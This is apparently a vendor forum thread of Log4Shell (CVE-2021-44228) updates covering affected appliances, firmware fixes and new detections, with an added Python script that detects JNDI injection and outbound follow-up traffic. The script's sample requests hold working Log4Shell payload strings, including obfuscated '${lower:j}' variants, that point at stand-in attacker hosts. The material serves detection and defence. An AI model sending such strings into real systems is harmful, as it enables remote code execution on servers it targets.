ExtraHop Update on Log4Shell

In addition to the Threat Briefing already delivered, the ExtraHop team is continuing work on detectors for the critical Log4Shell issue (CVE-2021-44228).

No ExtraHop sensors are vulnerable except EXA sensors.
EXA sensors contain vulnerable log4j code but are not vulnerable to the Remote Code Execution attack. It is theoretically possible that EXAs are vulnerable to an information leakage attack but we have not yet found a vector for an unauthenticated information leak.

New firmware releases are in flight. If an immediate fix is desired there is a Support Pack available that will make the same fix as the firmware. Contact Support to obtain the Support Pack.

Update:

There has been some information that remote code execution is possible against some versions of Java that were previously believed to be protected.

ExtraHop still believes sensors are not vulnerable to unauthenticated attacks.

The ExtraHop team continues to work on new ways to detect the critical Log4Shell issue. Watch this thread for updates.

Update on ExtraHop Explore appliance and ExtraHop functionality

Log4Shell is a remote code execution (RCE) vulnerability in Apache Log4j2. Thousands of enterprise applications, cloud applications, and services depend on Log4j, which is an open source Java logging library. This zero-day vulnerability (CVE-2021-44228) is being actively exploited.

As previously stated, the vulnerability only affects Explore appliances.

ExtraHop has released a number of deliverables in response to the Log4Shell vulnerability. We recommend that all customers upgrade to the latest available firmware.

  • We released a Threat Briefing last week to all Reveal(x) deployments connected to online services.

  • We published a blog post last week.

  • We published a forum post last week.

  • We released firmware versions 8.5.4 and 8.6.5 on Monday, December 13th, and will release firmware version 8.7 in the next week. These releases address the Log4Shell vulnerability in the Explore appliance and add the following functionality to enhance the ExtraHop system’s ability to detect Log4Shell attempts:

    • Added LDAP traffic classification to all ports, which enables External LDAP Connections.
    • Added IIOP and Java RMI traffic classification, which helps to identify Log4Shell over these protocols.
    • Updated the Unusual Executable File Download for .class file detection. This detection identifies Java applications that are retrieving code to execute from a remote host.
    • Added the Request to External LDAP Server detection. This detection identifies LDAP connections made to an external server.
    • Added the Log4Shell JNDI Injection Attempt detection. This detection identifies attempts to inject jndi: strings.
    • Added the Outbound Log4shell Activity detection. This detection identifies any outbound activity generated from the attempts that were seen by the Injection Attempt detector.

  • The Threat Briefing has been updated to include the above detectors.

  • We are planning a courtesy firmware update for 8.4 later this week even though it is outside of our software development lifecycle. This release only addresses the vulnerability for the Explore appliance, but does not include other updates.

  • For versions older than 8.4, a Support script is available to mitigate the Log4Shell vulnerability. Please contact Support for assistance.

Please watch the forum and blog posts for further updates!

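
The three detections described in the post above (JNDI Injection Attempt, Request to External LDAP Server, and Outbound Log4shell Activity) follow one pattern: spot a `jndi:` reference in a request, then watch for the client reaching out to the host that reference names. The script below is an added illustration of that logic written for this thread; it is not ExtraHop detector code and makes no claim about how the Reveal(x) detectors are implemented. The request lines and flow records are constructed samples using documentation IP ranges, and the scheme list, the lookup-normalization rules, and the RFC 1918 definition of "internal" are assumptions of the example. Because obfuscated lookups such as `${lower:j}` or `${::-j}` hide the literal token, the example normalizes nested lookups before matching, which is why the two obfuscated sample lines are caught.

```python
import ipaddress
import re

# Constructed sample HTTP request lines, roughly as a sensor would see them (not real traffic).
SAMPLE_REQUESTS = [
    'GET /login HTTP/1.1 User-Agent: ${jndi:ldap://203.0.113.10:1389/a}',
    'POST /api HTTP/1.1 X-Api-Version: ${${lower:j}ndi:rmi://203.0.113.10:1099/x}',
    'GET /health HTTP/1.1 User-Agent: ${${::-j}ndi:dns://203.0.113.11/probe}',
    'GET /index.html HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64)',
]

# Constructed outbound flow records: (client, server, server_port, protocol).
SAMPLE_FLOWS = [
    ('10.0.0.5', '203.0.113.10', 1389, 'LDAP'),
    ('10.0.0.5', '203.0.113.10', 1099, 'RMI'),
    ('10.0.0.5', '198.51.100.7', 443, 'HTTPS'),
    ('10.0.0.9', '203.0.113.11', 53, 'DNS'),
    ('10.0.0.9', '10.0.0.2', 389, 'LDAP'),
]

# "Internal" is defined here as RFC 1918 space (an assumption of this example). The explicit
# list is used instead of ipaddress' is_private, which also treats documentation ranges as private.
RFC1918 = [ipaddress.ip_network(n) for n in ('10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16')]

# Nested lookups that hide the literal "jndi" token: ${lower:j}, ${upper:J}, ${::-j}, ${env:X:-j}.
CASE_LOOKUP = re.compile(r'\$\{(?:lower|upper):([^{}])\}', re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r'\$\{[^{}]*:-([^{}]*)\}')
# Schemes limited to the ones named in the thread plus dns; host and optional port are captured.
JNDI_REF = re.compile(r'jndi:(ldap|ldaps|rmi|dns|iiop)://([^/\s}:]+)(?::(\d+))?', re.IGNORECASE)


def normalize(text):
    """Collapse nested Log4j lookups until the text stops changing."""
    while True:
        new = CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            return text
        text = new


def find_jndi_injections(line):
    """JNDI Injection Attempt: return (scheme, host, port) for each jndi: reference in a line."""
    hits = []
    for m in JNDI_REF.finditer(normalize(line)):
        scheme, host, port = m.group(1).lower(), m.group(2), m.group(3)
        hits.append((scheme, host, int(port) if port else None))
    return hits


def external_ldap_flows(flows):
    """Request to External LDAP Server: LDAP flows whose server is outside RFC 1918 space."""
    flagged = []
    for client, server, port, proto in flows:
        addr = ipaddress.ip_address(server)
        if proto == 'LDAP' and not any(addr in net for net in RFC1918):
            flagged.append((client, server, port, proto))
    return flagged


def injection_hosts(requests):
    """Hosts named by every injection attempt seen in the request set."""
    return {host for line in requests for _, host, _ in find_jndi_injections(line)}


def outbound_after_injection(requests, flows):
    """Outbound Log4shell Activity: any flow to a host that an injection attempt pointed at."""
    hosts = injection_hosts(requests)
    return [f for f in flows if f[1] in hosts]


if __name__ == '__main__':
    for line in SAMPLE_REQUESTS:
        for hit in find_jndi_injections(line):
            print('JNDI injection attempt:', hit, 'in', line[:32] + '...')
    for f in external_ldap_flows(SAMPLE_FLOWS):
        print('Request to external LDAP server:', f)
    for f in outbound_after_injection(SAMPLE_REQUESTS, SAMPLE_FLOWS):
        print('Outbound Log4Shell activity:', f)
```

The second-stage correlation is the part worth keeping in mind when triaging: an injection attempt alone is usually noise from mass scanning, while a subsequent LDAP, RMI or DNS connection from the targeted server to the host named in the string indicates the lookup was actually evaluated and the host deserves immediate attention.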

Update

Firmware 8.4.7 has now been released.

This is a security release only to address the Log4j remote code execution vulnerability (CVE-2021-44228).

ExtraHop is aware of CVE-2021-45046 and that log4j has released version 2.16.0.

At this time, ExtraHop does not believe 8.5.4 and 8.6.5 appliances are vulnerable.

If the situation changes, we will update this thread.

Update:

Firmware version 8.7 was released Friday. Read the What’s New blog post.

The team is continuing research on log4shell. Look for additional information in the product.

ExtraHop is aware of even more bypasses to log4j and we recommend users upgrade to one of 8.4.7, 8.5.4, 8.6.5 or 8.7.

Hi Costlow, do you know what the Log4j version is, and whether any JNDI component is used in EXA?

Please contact Support for exact version numbers.
Version 8.7 removed JndiLookup.class.